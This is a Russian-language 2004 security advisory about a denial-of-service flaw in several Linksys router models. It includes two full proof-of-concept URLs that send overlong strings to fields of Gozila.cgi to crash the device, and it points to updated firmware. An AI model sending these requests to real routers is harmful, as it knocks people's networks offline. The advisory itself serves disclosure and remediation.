Security Lab

Удалеенный отказ в обслуживании в нескольких Linksys маршрутизаторах

Дата публикации:05.06.2004
Всего просмотров:1129
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Linksys Routers Firmware 1.45.7; Models BEFSR41, BEFSR41 v3, BEFSRU31, BEFSR11, BEFSX41, BEFSR81 v2/v3, BEFW11S4 v3, и BEFW11S4 v4

Описание: Отказ в обслуживании обнаружен в нескольких Linksys маршрутизаторах. Удаленный пользователь может аварийно завершить работу устройства.

Удаленный пользователь на внутренней сети может послать строку размером около 150 символов к sysPasswd и sysPasswdConfirm полям в 'Gozila.cgi' сценарии, чтобы аварийно завершить работу устройства.

 
http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA&UPnP_Work=1&FactoryDefaults=0

http://192.168.1.1/Gozila.cgi?hostName=&DomainName=AAAA
AAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A AAAAAAAAAAAAAAA&WANConnectionSel=0&ipAddr1=192&ipAddr2=168&
ipAddr3=1&ipAddr4=1&netMask=0&WANConnectionType=1

URL производителя:http://www.linksys.com/

Решение:Установите обновленную версию программы: http://www.linksys.com/download/firmware.asp ?fwid=3

Ссылки: DoS vuln in various versions of Linksys routers.